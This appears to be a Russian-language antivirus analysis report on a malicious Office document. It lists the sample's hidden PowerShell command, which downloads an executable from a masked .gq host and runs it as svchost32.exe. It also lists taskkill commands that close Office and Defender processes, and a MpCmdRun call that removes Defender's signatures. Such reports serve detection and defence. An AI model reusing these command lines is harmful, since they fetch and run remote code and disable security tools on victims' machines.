Техническая информация
Вредоносные функции
Загружает и запускает на исполнение
- http://lo######lhostingpanel.gq/work/worknew/exe/5.exe как c:\users\public\\svchost32.exe
Запускает на исполнение
- '<SYSTEM32>\taskkill.exe' /f /im winword.exe
- '<SYSTEM32>\taskkill.exe' /f /im Excel.exe
- '<SYSTEM32>\taskkill.exe' /f /im MSPUB.exe
- '<SYSTEM32>\taskkill.exe' /f /im POWERPNT.EXE
- '<SYSTEM32>\taskkill.exe' /f /im MSASCuiL.exe
- '<SYSTEM32>\taskkill.exe' /f /im MpCmdRun.exe
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\cmd.exe' /c powershell -W Hidden (New-Object System.NeT.WeBClieNT).DownloadFile('http://lo######lhostingpanel.gq/work/worknew/exe/5.exe','%Public%\\svchost32.exe');Start-Process '%Public%\\svchost32.exe...
- '<SYSTEM32>\cmd.exe' /c taskkill /f /im winword.exe&taskkill /f /im Excel.exe&taskkill /f /im MSPUB.exe&taskkill /f /im POWERPNT.EXE&taskkill /f /im MSASCuiL.exe&taskkill /f /im MpCmdRun.exe&cd "%ProgramFiles%\Wind...
Изменения в файловой системе
Создает следующие файлы
- %TEMP%\mpcmdrun.log
Сетевая активность
UDP
- DNS ASK lo######lhostingpanel.gq
Другое
Ищет следующие окна
- ClassName: '' WindowName: ''
Создает и запускает на исполнение
- '<SYSTEM32>\cmd.exe' /c powershell -W Hidden (New-Object System.NeT.WeBClieNT).DownloadFile('http://lo######lhostingpanel.gq/work/worknew/exe/5.exe','%Public%\\svchost32.exe');Start-Process '%Public%\\svchost32.exe...' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c taskkill /f /im winword.exe&taskkill /f /im Excel.exe&taskkill /f /im MSPUB.exe&taskkill /f /im POWERPNT.EXE&taskkill /f /im MSASCuiL.exe&taskkill /f /im MpCmdRun.exe&cd "%ProgramFiles%\Wind...' (со скрытым окном)
Запускает на исполнение
- '%ProgramFiles%\microsoft office\office14\excel.exe' -Embedding
- '%ProgramFiles%\windows defender\mpcmdrun.exe' -removedefinitions -dynamicsignatures
